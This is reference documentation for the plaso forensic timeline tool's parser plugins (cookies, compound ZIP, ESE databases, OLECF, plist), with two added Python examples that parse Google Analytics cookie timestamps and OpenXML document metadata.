URLS = ['http://www.dfinews.com/articles/2012/02/google-analytics-cookies-and-forensic-implications']
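The four cookie layouts documented above (__utma, __utmb, __utmz, __utmt), each in its dotted form and its bare <last time> form, parsed by one function in an added example. This is not plaso's ganalytics plugin code. Two things the page does not state are assumptions of this example: the bare <last time> values are read as WebKit timestamps (microseconds since 1601-01-01), and a dotted-form timestamp longer than ten digits (as in the __utmb examples) is read as milliseconds rather than seconds. The sample cookie values are the ones quoted on the page.

```python
"""Parse Google Analytics __utm* cookie values into timestamped events."""
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone
from typing import Dict, List, Optional
from urllib.parse import unquote

_POSIX_EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)
# Microseconds between the WebKit epoch (1601-01-01) and the POSIX epoch.
_WEBKIT_TO_POSIX_US = 11644473600 * 1_000_000


def posix_to_datetime(value: str) -> datetime:
    """Dotted-form timestamp: seconds (10 digits) or milliseconds (13 digits).
    The digit-count heuristic is this example's assumption."""
    number = int(value)
    if len(value) > 10:
        return _POSIX_EPOCH + timedelta(milliseconds=number)
    return _POSIX_EPOCH + timedelta(seconds=number)


def webkit_to_datetime(value: str) -> datetime:
    """Bare '<last time>' form, assumed here to be WebKit time in microseconds."""
    return _POSIX_EPOCH + timedelta(microseconds=int(value) - _WEBKIT_TO_POSIX_US)


@dataclass
class GACookieEvent:
    """Constructed counterpart of GoogleAnalyticsEventData plus a timestamp."""
    cookie_name: str
    timestamp: datetime
    description: str
    domain_hash: Optional[str] = None
    visitor_id: Optional[str] = None
    pages_viewed: Optional[int] = None
    sessions: Optional[int] = None
    sources: Optional[int] = None
    variables: Dict[str, str] = field(default_factory=dict)


def _bare(cookie_name: str, parts: List[str]) -> List[GACookieEvent]:
    return [GACookieEvent(cookie_name, webkit_to_datetime(parts[0]), "Last Visited Time")]


def parse_ga_cookie(cookie_name: str, cookie_data: str) -> List[GACookieEvent]:
    """Dispatch on the cookie name, one branch per plugin on the page."""
    if cookie_name == "__utma":
        parts = cookie_data.split(".")
        if len(parts) == 1:
            return _bare(cookie_name, parts)
        if len(parts) != 6:
            raise ValueError(f"__utma: expected 1 or 6 fields, got {len(parts)}")
        domain_hash, visitor_id, first, previous, last, sessions = parts
        common = dict(domain_hash=domain_hash, visitor_id=visitor_id, sessions=int(sessions))
        return [
            GACookieEvent(cookie_name, posix_to_datetime(first), "Analytics Creation Time", **common),
            GACookieEvent(cookie_name, posix_to_datetime(previous), "Analytics Previous Time", **common),
            GACookieEvent(cookie_name, posix_to_datetime(last), "Last Visited Time", **common),
        ]
    if cookie_name == "__utmb":
        parts = cookie_data.split(".")
        if len(parts) == 1:
            return _bare(cookie_name, parts)
        if len(parts) != 4:
            raise ValueError(f"__utmb: expected 1 or 4 fields, got {len(parts)}")
        domain_hash, pages_viewed, _unknown, last = parts
        return [GACookieEvent(cookie_name, posix_to_datetime(last), "Last Visited Time",
                              domain_hash=domain_hash, pages_viewed=int(pages_viewed))]
    if cookie_name == "__utmz":
        # The variables field may itself contain '.', so split at most four times.
        parts = cookie_data.split(".", 4)
        if len(parts) == 1:
            return _bare(cookie_name, parts)
        if len(parts) != 5:
            raise ValueError(f"__utmz: expected 1 or 5 fields, got {len(parts)}")
        domain_hash, last, sessions, sources, variables = parts
        parsed = {}
        for item in variables.split("|"):
            key, _, value = item.partition("=")
            parsed[key] = unquote(value)       # "(not%20provided)" -> "(not provided)"
        return [GACookieEvent(cookie_name, posix_to_datetime(last), "Last Visited Time",
                              domain_hash=domain_hash, sessions=int(sessions),
                              sources=int(sources), variables=parsed)]
    if cookie_name == "__utmt":
        return _bare(cookie_name, [cookie_data])
    raise ValueError(f"not a Google Analytics cookie handled here: {cookie_name}")


if __name__ == "__main__":
    for event in parse_ga_cookie("__utma", "137167072.1215918423.1383170166.1383170166.1383170166.1"):
        print(event.timestamp.isoformat(), event.description, event.visitor_id)
```

Rejecting a field count other than the two documented shapes matters more than it looks: a cookie value that was truncated or URL-mangled by a browser export would otherwise be read with its timestamps shifted one column, which is a silent error in a timeline.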
plaso.parsers.cookie_plugins.interface module
This file contains an interface for browser cookie plugins.
class plaso.parsers.cookie_plugins.interface.BaseCookiePlugin
Bases: plaso.parsers.plugins.BasePlugin
A browser cookie plugin for Plaso.
This is a generic cookie parsing interface that can handle parsing cookies from all browsers.
COOKIE_NAME = ''
DATA_FORMAT = 'Browser cookie data'
abstract GetEntries(parser_mediator, cookie_data=None, url=None, **kwargs) Extract and return EventObjects from the data structure.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• cookie_data (Optional[bytes]) – cookie data, as a byte sequence.
• url (Optional[str]) – URL or path where the cookie was set.
NAME = 'cookie_plugin'
Process(parser_mediator, cookie_name, cookie_data, url, **kwargs) Determine if this is the right plugin for this cookie.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• cookie_name (str) – the name of the cookie value.
• cookie_data (bytes) – the cookie data, as a byte sequence.
• url (str) – the full URL or path where the cookie was set.
Raises
• errors.WrongPlugin – If the cookie name differs from the one supplied in COOKIE_NAME.
• ValueError – If cookie_name or cookie_data are not set.
plaso.parsers.cookie_plugins.manager module
The cookie plugins manager object.
class plaso.parsers.cookie_plugins.manager.CookiePluginsManager
Bases: object
Class that implements the cookie plugins manager.
classmethod DeregisterPlugin(plugin_class) Deregisters a plugin class.
The plugin classes are identified based on their lower case name.
Parameters plugin_class (type) – the class object of the plugin.
Raises KeyError – if plugin class is not set for the corresponding name.
classmethod GetPlugins() Retrieves the cookie plugins.
Returns list of all cookie plugin objects.
Return type list[type]
classmethod RegisterPlugin(plugin_class) Registers a plugin class.
The plugin classes are identified based on their lower case name.
Parameters plugin_class (type) – the class object of the plugin.
Raises KeyError – if plugin class is already set for the corresponding name.
classmethod RegisterPlugins(plugin_classes) Registers plugin classes.
The plugin classes are identified based on their lower case name.
Parameters plugin_classes (list[type]) – a list of class objects of the plugins.
Raises KeyError – if plugin class is already set for the corresponding name.
Module contents
Imports for the cookies parser.
plaso.parsers.czip_plugins package
Submodules
plaso.parsers.czip_plugins.interface module
Interface for compound ZIP file plugins.
class plaso.parsers.czip_plugins.interface.CompoundZIPPlugin
Bases: plaso.parsers.plugins.BasePlugin
Compound ZIP parser plugin.
DATA_FORMAT = 'Compound ZIP file'
abstract InspectZipFile(parser_mediator, zip_file) Inspects a compound ZIP file and produces events.
This is the main method that a compound ZIP plugin needs to implement.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• zip_file (zipfile.ZipFile) – the ZIP file. It should not be closed in this method, but will be closed by the parser logic in czip.py.
NAME = 'czip_plugin'
Process(parser_mediator, zip_file, archive_members) Determines if this is the correct plugin; if so proceed with processing.
This method checks if the ZIP file contains the paths specified in REQUIRED_PATHS. If all paths are present, the plugin logic processing continues in InspectZipFile.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• zip_file (zipfile.ZipFile) – the ZIP file. It should not be closed in this method, but will be closed by the parser logic in czip.py.
• archive_members (list[str]) – file paths in the archive.
Raises
• UnableToParseFile – when the file cannot be parsed.
• ValueError – if a subclass has not specified REQUIRED_PATHS.
• WrongCompoundZIPPlugin – If this plugin is not able to process the given file.
REQUIRED_PATHS = frozenset({})
plaso.parsers.czip_plugins.oxml module
Compound ZIP parser plugin for OpenXML files.
class plaso.parsers.czip_plugins.oxml.OpenXMLEventData
Bases: plaso.containers.events.EventData
OXML event data.
app_version – version of application that created document.
Type str
author – name of author.
Type str
creating_app – name of application that created document.
Type str
doc_security – ???
Type str
hyperlinks_changed – True if hyperlinks have changed.
Type bool
i4 – ???
Type str
last_saved_by – name of user that last saved the document.
Type str
links_up_to_date – True if the links are up to date.
Type bool
number_of_characters – number of characters without spaces in the document.
Type int
number_of_characters_with_spaces – number of characters including spaces in the document.
Type int
number_of_lines – number of lines in the document.
Type int
number_of_pages – number of pages in the document.
Type int
number_of_paragraphs – number of paragraphs in the document.
Type int
number_of_words – number of words in the document.
Type int
revision_number – revision number.
Type int
scale_crop – True if crop to scale is enabled.
Type bool
shared_doc – True if document is shared.
Type bool
template – name of template ???
Type str
total_time – ???
Type str
DATA_TYPE = 'metadata:openxml'
class plaso.parsers.czip_plugins.oxml.OpenXMLPlugin
Bases: plaso.parsers.czip_plugins.interface.CompoundZIPPlugin
Parse metadata from OXML files.
DATA_FORMAT = 'OpenXML (OXML) file'
InspectZipFile(parser_mediator, zip_file) Parses an OXML file-like object.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• zip_file (zipfile.ZipFile) – the zip file containing OXML content. It is not closed in this method, but will be closed by the parser logic in czip.py.
Raises UnableToParseFile – when the file cannot be parsed.
NAME = 'oxml'
REQUIRED_PATHS = frozenset({'[Content_Types].xml', '_rels/.rels', 'docProps/core.xml'})
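The compound ZIP plugin flow described above (check REQUIRED_PATHS, then inspect the archive) worked through for the OpenXML case as an added example; it is not plaso's czip parser or oxml plugin code. REQUIRED_PATHS is the set quoted on the page; the WrongCompoundZIPPlugin class, the namespace URIs for docProps/core.xml and the build_sample_docx container are this example's own, and the sample container is constructed, not a real document.

```python
"""Check a compound ZIP for the OpenXML required paths and read core.xml metadata."""
import io
import xml.etree.ElementTree as ET
import zipfile
from typing import Dict, Iterable, Optional

# Required paths as listed on the page for the oxml plugin.
REQUIRED_PATHS = frozenset({'[Content_Types].xml', '_rels/.rels', 'docProps/core.xml'})

# Namespaces used by OPC core properties in docProps/core.xml (assumed here).
_NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
    "dcterms": "http://purl.org/dc/terms/",
}


class WrongCompoundZIPPlugin(Exception):
    """Raised when the archive does not carry the plugin's required paths."""


def check_required_paths(archive_members: Iterable[str], required=REQUIRED_PATHS) -> None:
    """The Process() step: every required path must be present, else wrong plugin."""
    missing = set(required) - set(archive_members)
    if missing:
        raise WrongCompoundZIPPlugin(f"missing required paths: {sorted(missing)}")


def parse_core_properties(zip_file: zipfile.ZipFile) -> Dict[str, Optional[str]]:
    """The InspectZipFile() step for core.xml: author, last saver, dates, revision.
    Absent elements yield None; documents omit these fields freely."""
    with zip_file.open("docProps/core.xml") as stream:
        root = ET.parse(stream).getroot()

    def text(path: str) -> Optional[str]:
        element = root.find(path, _NS)
        return element.text if element is not None else None

    return {
        "author": text("dc:creator"),
        "last_saved_by": text("cp:lastModifiedBy"),
        "created": text("dcterms:created"),
        "modified": text("dcterms:modified"),
        "revision_number": text("cp:revision"),
    }


def inspect_oxml(data: bytes) -> Dict[str, Optional[str]]:
    """Open the archive once, gate on the required paths, then parse; the
    ZipFile is closed here, by the caller of the plugin steps, as on the page."""
    with zipfile.ZipFile(io.BytesIO(data)) as zip_file:
        check_required_paths(zip_file.namelist())
        return parse_core_properties(zip_file)


def build_sample_docx() -> bytes:
    """Constructed minimal OpenXML-shaped container (not a real document)."""
    core = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<cp:coreProperties xmlns:cp="%s" xmlns:dc="%s" xmlns:dcterms="%s" '
        'xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">'
        '<dc:creator>alice</dc:creator><cp:lastModifiedBy>bob</cp:lastModifiedBy>'
        '<dcterms:created xsi:type="dcterms:W3CDTF">2020-10-07T12:00:00Z</dcterms:created>'
        '<dcterms:modified xsi:type="dcterms:W3CDTF">2020-10-08T09:30:00Z</dcterms:modified>'
        '<cp:revision>3</cp:revision></cp:coreProperties>'
    ) % (_NS["cp"], _NS["dc"], _NS["dcterms"])
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as zip_file:
        zip_file.writestr("[Content_Types].xml", "<Types/>")
        zip_file.writestr("_rels/.rels", "<Relationships/>")
        zip_file.writestr("docProps/core.xml", core)
    return buffer.getvalue()


if __name__ == "__main__":
    print(inspect_oxml(build_sample_docx()))
```

The required-path gate is cheap and runs before any XML is parsed, so an arbitrary ZIP that merely carries a .docx extension is turned away with WrongCompoundZIPPlugin rather than reaching the XML parser.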
Module contents
Imports for the compound ZIP parser.
plaso.parsers.esedb_plugins package
Submodules
plaso.parsers.esedb_plugins.file_history module
Parser for the Microsoft File History ESE database.
class plaso.parsers.esedb_plugins.file_history.FileHistoryESEDBPlugin
Bases: plaso.parsers.esedb_plugins.interface.ESEDBPlugin
Parses a File History ESE database file.
DATA_FORMAT = 'Windows 8 File History ESE database file'
NAME = 'file_history'
ParseNameSpace(parser_mediator, cache=None, database=None, table=None, **unused_kwargs) Parses the namespace table.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• cache (Optional[ESEDBCache]) – cache.
• database (Optional[pyesedb.file]) – ESE database.
• table (Optional[pyesedb.table]) – table.
Raises ValueError – if the database or table value is missing.
REQUIRED_TABLES = {'backupset': '', 'file': '', 'library': '', 'namespace': 'ParseNameSpace'}
class plaso.parsers.esedb_plugins.file_history.FileHistoryNamespaceEventData
Bases: plaso.containers.events.EventData
File history namespace table event data.
file_attribute – file attribute.
Type int
identifier – identifier.
Type str
original_filename – original file name.
Type str
parent_identifier – parent identifier.
Type str
usn_number – USN number.
Type int
DATA_TYPE = 'file_history:namespace:event'
plaso.parsers.esedb_plugins.interface module
This file contains the interface for ESE database plugins.
class plaso.parsers.esedb_plugins.interface.ESEDBPlugin
Bases: plaso.parsers.plugins.BasePlugin
The ESE database plugin interface.
BINARY_DATA_COLUMN_TYPES = frozenset({pyesedb.column_types.BINARY_DATA, pyesedb.column_types.LARGE_BINARY_DATA})
DATA_FORMAT = 'ESE database file'
FLOATING_POINT_COLUMN_TYPES = frozenset({pyesedb.column_types.FLOAT_32BIT, pyesedb.column_types.DOUBLE_64BIT})
GetEntries(parser_mediator, cache=None, database=None, **kwargs) Extracts event objects from the database.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• cache (Optional[ESEDBCache]) – cache.
• database (Optional[pyesedb.file]) – ESE database.
Raises ValueError – If the database attribute is not valid.
INTEGER_COLUMN_TYPES = frozenset({pyesedb.column_types.CURRENCY, pyesedb.column_types.INTEGER_16BIT_SIGNED, pyesedb.column_types.INTEGER_32BIT_UNSIGNED, pyesedb.column_types.DATE_TIME, pyesedb.column_types.INTEGER_16BIT_UNSIGNED, pyesedb.column_types.INTEGER_64BIT_SIGNED, pyesedb.column_types.INTEGER_8BIT_UNSIGNED, pyesedb.column_types.INTEGER_32BIT_SIGNED})
NAME = 'esedb_plugin'
OPTIONAL_TABLES = {}
Process(parser_mediator, cache=None, database=None, **kwargs) Determines if this is the appropriate plugin for the database.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• cache (Optional[ESEDBCache]) – cache.
• database (Optional[pyesedb.file]) – ESE database.
Raises ValueError – If the database attribute is not valid.
REQUIRED_TABLES = {}
STRING_COLUMN_TYPES = frozenset({pyesedb.column_types.TEXT, pyesedb.column_types.LARGE_TEXT})
property required_tables – required table names.
Type set[str]
plaso.parsers.esedb_plugins.msie_webcache module
Parser for the Microsoft Internet Explorer WebCache ESE database.
The WebCache database (WebCacheV01.dat or WebCacheV24.dat) is used by MSIE as of version 10.
class plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheContainerEventData
Bases: plaso.containers.events.EventData
MSIE WebCache Container table event data.
access_count – access count.
Type int
cached_filename – name of the cached file.
Type str
cached_file_size – size of the cached file.
Type int
cache_identifier – cache identifier.
Type int
container_identifier – container identifier.
Type int
entry_identifier – entry identifier.
Type int
file_extension – file extension.
Type str
redirect_url – URL from which the request was redirected.
Type str
request_headers – request headers.
Type str
response_headers – response headers.
Type str
sync_count – sync count.
Type int
url – URL.
Type str
DATA_TYPE = 'msie:webcache:container'
class plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheContainersEventData
Bases: plaso.containers.events.EventData
MSIE WebCache Containers table event data.
container_identifier – container identifier.
Type int
directory – name of the cache directory.
Type str
name – name of the cache container.
Type str
set_identifier – set identifier.
Type int
DATA_TYPE = 'msie:webcache:containers'
class plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheESEDBPlugin
Bases: plaso.parsers.esedb_plugins.interface.ESEDBPlugin
Parses a MSIE WebCache ESE database file.
DATA_FORMAT = 'Internet Explorer WebCache ESE database (WebCacheV01.dat, WebCacheV24.dat) file'
NAME = 'msie_webcache'
OPTIONAL_TABLES = {'Partitions': 'ParsePartitionsTable', 'PartitionsEx': 'ParsePartitionsTable'}
ParseContainersTable(parser_mediator, database=None, table=None, **unused_kwargs) Parses a Containers table.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• database (Optional[pyesedb.file]) – ESE database.
• table (Optional[pyesedb.table]) – table.
Raises ValueError – if the database or table value is missing.
ParseLeakFilesTable(parser_mediator, database=None, table=None, **unused_kwargs) Parses a LeakFiles table.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• database (Optional[pyesedb.file]) – ESE database.
• table (Optional[pyesedb.table]) – table.
Raises ValueError – if the database or table value is missing.
ParsePartitionsTable(parser_mediator, database=None, table=None, **unused_kwargs) Parses a Partitions or PartitionsEx table.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• database (Optional[pyesedb.file]) – ESE database.
• table (Optional[pyesedb.table]) – table.
Raises ValueError – if the database or table value is missing.
REQUIRED_TABLES = {'Containers': 'ParseContainersTable', 'LeakFiles': 'ParseLeakFilesTable'}
class plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheLeakFilesEventData
Bases: plaso.containers.events.EventData
MSIE WebCache LeakFiles event data.
cached_filename – name of the cached file.
Type str
leak_identifier – leak identifier.
Type int
DATA_TYPE = 'msie:webcache:leak_file'
class plaso.parsers.esedb_plugins.msie_webcache.MsieWebCachePartitionsEventData
Bases: plaso.containers.events.EventData
MSIE WebCache Partitions table event data.
directory – directory.
Type str
partition_identifier – partition identifier.
Type int
partition_type – partition type.
Type int
table_identifier – table identifier.
Type int
DATA_TYPE = 'msie:webcache:partitions'
plaso.parsers.esedb_plugins.srum module
Parser for the System Resource Usage Monitor (SRUM) ESE database.
For more information about the database format see: https://github.com/libyal/esedb-kb/blob/master/documentation/System%20Resource%20Usage%20Monitor%20(SRUM).asciidoc
class plaso.parsers.esedb_plugins.srum.SRUMApplicationResourceUsageEventData
Bases: plaso.containers.events.EventData
SRUM application resource usage event data.
Note that the interpretation of some of these values is undocumented as far as currently known.
application – application.
Type str
background_bytes_read – background number of bytes read.
Type int
background_bytes_written – background number of bytes written.
Type int
background_context_switches – number of background context switches.
Type int
background_cycle_time – background cycle time.
Type int
background_number_for_flushes – background number of flushes.
Type int
background_number_for_read_operations – background number of read operations.
Type int
background_number_for_write_operations – background number of write operations.
Type int
face_time – face time.
Type int
foreground_bytes_read – foreground number of bytes read.
Type int
foreground_bytes_written – foreground number of bytes written.
Type int
foreground_context_switches – number of foreground context switches.
Type int
foreground_cycle_time – foreground cycle time.
Type int
foreground_number_for_flushes – foreground number of flushes.
Type int
foreground_number_for_read_operations – foreground number of read operations.
Type int
foreground_number_for_write_operations – foreground number of write operations.
Type int
identifier – record identifier.
Type int
user_identifier – user identifier, which is a Windows NT security identifier.
Type str
DATA_TYPE = 'windows:srum:application_usage'
class plaso.parsers.esedb_plugins.srum.SRUMNetworkConnectivityUsageEventData
Bases: plaso.containers.events.EventData
SRUM network connectivity usage event data.
Note that the interpretation of some of these values is undocumented as far as currently known.
application – application.
Type str
identifier – record identifier.
Type int
interface_luid – interface locally unique identifier (LUID).
Type int
l2_profile_flags – L2 profile flags.
Type int
l2_profile_identifier – L2 profile identifier.
Type int
user_identifier – user identifier, which is a Windows NT security identifier.
Type str
DATA_TYPE = 'windows:srum:network_connectivity'
class plaso.parsers.esedb_plugins.srum.SRUMNetworkDataUsageEventData
Bases: plaso.containers.events.EventData
SRUM network data usage event data.
Note that the interpretation of some of these values is undocumented as far as currently known.
application – application.
Type str
bytes_received – number of bytes received.
Type int
bytes_sent – number of bytes sent.
Type int
identifier – record identifier.
Type int
interface_luid – interface locally unique identifier (LUID).
Type int
l2_profile_flags – L2 profile flags.
Type int
l2_profile_identifier – L2 profile identifier.
Type int
user_identifier – user identifier, which is a Windows NT security identifier.
Type str
DATA_TYPE = 'windows:srum:network_usage'
class plaso.parsers.esedb_plugins.srum.SystemResourceUsageMonitorESEDBPlugin
Bases: plaso.parsers.esedb_plugins.interface.ESEDBPlugin
Parses a System Resource Usage Monitor (SRUM) ESE database file.
DATA_FORMAT = 'System Resource Usage Monitor (SRUM) ESE database file'
NAME = 'srum'
OPTIONAL_TABLES = {'{973F5D5C-1D90-4944-BE8E-24B94231A174}': 'ParseNetworkDataUsage', '{D10CA2FE-6FCF-4F6D-848E-B2E99266FA89}': 'ParseApplicationResourceUsage', '{DD6636C4-8929-4683-974E-22C046A43763}': 'ParseNetworkConnectivityUsage'}
ParseApplicationResourceUsage(parser_mediator, cache=None, database=None, table=None, **unused_kwargs) Parses the application resource usage table.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• cache (Optional[ESEDBCache]) – cache, which contains information about the identifiers stored in the SruDbIdMapTable table.
• database (Optional[pyesedb.file]) – ESE database.
• table (Optional[pyesedb.table]) – table.
ParseNetworkConnectivityUsage(parser_mediator, cache=None, database=None, table=None, **unused_kwargs) Parses the network connectivity usage monitor table.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• cache (Optional[ESEDBCache]) – cache, which contains information about the identifiers stored in the SruDbIdMapTable table.
• database (Optional[pyesedb.file]) – ESE database.
• table (Optional[pyesedb.table]) – table.
ParseNetworkDataUsage(parser_mediator, cache=None, database=None, table=None, **unused_kwargs) Parses the network data usage monitor table.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• cache (Optional[ESEDBCache]) – cache, which contains information about the identifiers stored in the SruDbIdMapTable table.
• database (Optional[pyesedb.file]) – ESE database.
• table (Optional[pyesedb.table]) – table.
REQUIRED_TABLES = {'SruDbIdMapTable': ''}
Module contents
Imports for the ESE database parser.
plaso.parsers.olecf_plugins package
Submodules
plaso.parsers.olecf_plugins.automatic_destinations module
Plugin to parse .automaticDestinations-ms OLECF files.
class plaso.parsers.olecf_plugins.automatic_destinations.AutomaticDestinationsDestListEntryEventData
Bases: plaso.containers.events.EventData
.automaticDestinations-ms DestList entry event data.
birth_droid_file_identifier – birth droid file identifier.
Type str
birth_droid_volume_identifier – birth droid volume identifier.
Type str
droid_file_identifier – droid file identifier.
Type str
droid_volume_identifier – droid volume identifier.
Type str
entry_number – DestList entry number.
Type int
path – path.
Type str
pin_status – pin status.
Type int
offset – offset of the DestList entry relative to the start of the DestList stream.
Type int
DATA_TYPE = 'olecf:dest_list:entry'
class plaso.parsers.olecf_plugins.automatic_destinations.AutomaticDestinationsOLECFPlugin
Bases: plaso.parsers.olecf_plugins.dtfabric_plugin.DtFabricBaseOLECFPlugin
Plugin that parses an .automaticDestinations-ms OLECF file.
DATA_FORMAT = 'Automatic destinations jump list OLE compound file (.automaticDestinations-ms)'
NAME = 'olecf_automatic_destinations'
ParseDestList(parser_mediator, olecf_item) Parses the DestList OLECF item.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• olecf_item (pyolecf.item) – OLECF item.
Raises UnableToParseFile – if the DestList cannot be parsed.
Process(parser_mediator, root_item=None, **kwargs) Parses an OLECF file.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• root_item (Optional[pyolecf.item]) – root item of the OLECF file.
Raises ValueError – If the root_item is not set.
REQUIRED_ITEMS = frozenset({'DestList'})
plaso.parsers.olecf_plugins.default module
The default plugin for parsing OLE Compound Files (OLECF).
class plaso.parsers.olecf_plugins.default.DefaultOLECFPlugin
Bases: plaso.parsers.olecf_plugins.interface.OLECFPlugin
Class to define the default OLECF file plugin.
DATA_FORMAT = 'Generic OLE compound item'
NAME = 'olecf_default'
Process(parser_mediator, root_item=None, **kwargs) Parses an OLECF file.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• root_item (Optional[pyolecf.item]) – root item of the OLECF file.
Raises ValueError – If the root item is not set.
class plaso.parsers.olecf_plugins.default.OLECFItemEventData
Bases: plaso.containers.events.EventData
OLECF item event data.
name – name of the OLE Compound File item.
Type str
size – data size of the OLE Compound File item.
Type int
DATA_TYPE = 'olecf:item'
plaso.parsers.olecf_plugins.dtfabric_plugin module
Shared functionality for dtFabric-based data format OLE CF plugins.
class plaso.parsers.olecf_plugins.dtfabric_plugin.DtFabricBaseOLECFPlugin
Bases: plaso.parsers.olecf_plugins.interface.OLECFPlugin
Shared functionality for dtFabric-based data format OLE CF plugins.
A dtFabric-based data format OLECF plugin defines its data format structures in a dtFabric definition file, for example "dtfabric.yaml":
name: int32
type: integer
description: 32-bit signed integer type
attributes:
  format: signed
  size: 4
  units: bytes
---
name: point3d
aliases: [POINT]
type: structure
description: Point in 3 dimensional space.
attributes:
  byte_order: little-endian
members:
- name: x
  aliases: [XCOORD]
  data_type: int32
- name: y
  data_type: int32
- name: z
  data_type: int32
The path to the definition file is defined in the class constant "_DEFINITION_FILE" and will be read on class instantiation.
The definition file contains data type definitions such as "int32" and "point3d" in the previous example.
A data type map can be used to create a Python object that represents the data type definition mapped to a byte stream, for example if we have the following byte stream: 01 00 00 00 02 00 00 00 03 00 00 00
The corresponding "point3d" Python object would be: point3d(x=1, y=2, z=3)
A plugin that wants to implement a dtFabric-based data format parser needs to:
• define a definition file and override _DEFINITION_FILE;
• implement the Process method (the abstract method of this class).
The _GetDataTypeMap method of this class can be used to retrieve data type maps from the "fabric", which is the collection of the data type definitions in the definition file. Data type maps are cached for reuse.
The _ReadStructure method of this class can be used to read structure data from a file-like object and create a Python object using a data type map.
abstract Process(parser_mediator, root_item=None, **kwargs)
Parses an OLECF file.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• root_item (Optional[pyolecf.item]) – root item of the OLECF file.
plaso.parsers.olecf_plugins.interface module
This file contains the necessary interface for OLECF plugins.
class plaso.parsers.olecf_plugins.interface.OLECFPlugin
Bases: plaso.parsers.plugins.BasePlugin
The OLECF parser plugin interface.
DATA_FORMAT = 'OLE compound file'
NAME = 'olecf_plugin'
abstract Process(parser_mediator, root_item=None, **kwargs)
Parses an OLECF file.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• root_item (Optional[pyolecf.item]) – root item of the OLECF file.
REQUIRED_ITEMS = frozenset({})
plaso.parsers.olecf_plugins.summary module
Plugin to parse the OLECF summary/document summary information items.
class plaso.parsers.olecf_plugins.summary.DocumentSummaryInformationOLECFPlugin
Bases: plaso.parsers.olecf_plugins.interface.OLECFPlugin
Plugin that parses DocumentSummaryInformation item from an OLECF file.
DATA_FORMAT = 'Document summary information (\\0x05DocumentSummaryInformation)'
NAME = 'olecf_document_summary'
Process(parser_mediator, root_item=None, **kwargs)
Parses a document summary information OLECF item.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• root_item (Optional[pyolecf.item]) – root item of the OLECF file.
Raises ValueError – If the root item is not set.
REQUIRED_ITEMS = frozenset({'\x05DocumentSummaryInformation'})
class plaso.parsers.olecf_plugins.summary.OLECFDocumentSummaryInformation(olecf_item)
Bases: plaso.parsers.olecf_plugins.summary.OLECFPropertySetStream
OLECF Document Summary information property set.
class plaso.parsers.olecf_plugins.summary.OLECFPropertySetStream(olecf_item)
Bases: object
OLECF property set stream.
date_time_properties
date and time properties and values.
Type dict[str, dfdatetime.DateTimeValues]
GetEventData()
Retrieves the properties as event data.
Returns event data.
Return type EventData
class plaso.parsers.olecf_plugins.summary.OLECFSummaryInformation(olecf_item)
Bases: plaso.parsers.olecf_plugins.summary.OLECFPropertySetStream
OLECF Summary information property set.
class plaso.parsers.olecf_plugins.summary.SummaryInformationOLECFPlugin
Bases: plaso.parsers.olecf_plugins.interface.OLECFPlugin
Plugin that parses the SummaryInformation item from an OLECF file.
DATA_FORMAT = 'Summary information (\\0x05SummaryInformation) (top-level only)'
NAME = 'olecf_summary'
Process(parser_mediator, root_item=None, **kwargs)
Parses a summary information OLECF item.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• root_item (Optional[pyolecf.item]) – root item of the OLECF file.
Raises ValueError – If the root item is not set.
REQUIRED_ITEMS = frozenset({'\x05SummaryInformation'})
Module contents
This file contains an import statement for each OLECF plugin.
plaso.parsers.plist_plugins package
Submodules
plaso.parsers.plist_plugins.airport module
Plist parser plugin for Airport plist files.
class plaso.parsers.plist_plugins.airport.AirportPlugin
Bases: plaso.parsers.plist_plugins.interface.PlistPlugin
Plist parser plugin for Airport plist files.
DATA_FORMAT = 'Airport plist file'
GetEntries(parser_mediator, match=None, **unused_kwargs)
Extracts relevant Airport entries.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• match (Optional[dict[str, object]]) – keys extracted from PLIST_KEYS.
NAME = 'airport'
PLIST_KEYS = frozenset({'RememberedNetworks'})
PLIST_PATH_FILTERS = frozenset({<plaso.parsers.plist_plugins.interface.PlistPathFilter object>})
plaso.parsers.plist_plugins.appleaccount module
Plist parser plugin for Apple Account plist files.
